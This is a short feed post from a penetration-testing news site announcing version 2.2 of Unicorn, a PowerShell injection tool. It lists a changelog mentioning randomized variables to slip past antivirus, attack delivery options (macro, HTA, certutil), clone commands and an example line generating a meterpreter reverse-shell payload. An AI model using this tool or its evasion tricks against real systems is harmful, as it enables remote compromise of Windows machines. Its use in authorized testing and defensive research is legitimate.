Quantcast
Channel: Penetration Test – Security List Network™
Viewing all articles
Browse latest Browse all 1152

Magic Unicorn Attack Vector v2.2.

$
0
0

Changelog v2.2:
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) – AV picking up on variables and base64 encoded strings

unicorn v2.2

unicorn v2.2

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Requirements:
+ Metasploit Framework

Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions

Usage:

git clone https://github.com/trustedsec/unicorn && cd unicorn
./unicorn --help
Update:
cd unicorn
git pull origin master

Example use:
python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : Master.zip | Clone Url
Source: TrustSec  | https://www.trustedsec.com/ | Our Post Before


Viewing all articles
Browse latest Browse all 1152

Trending Articles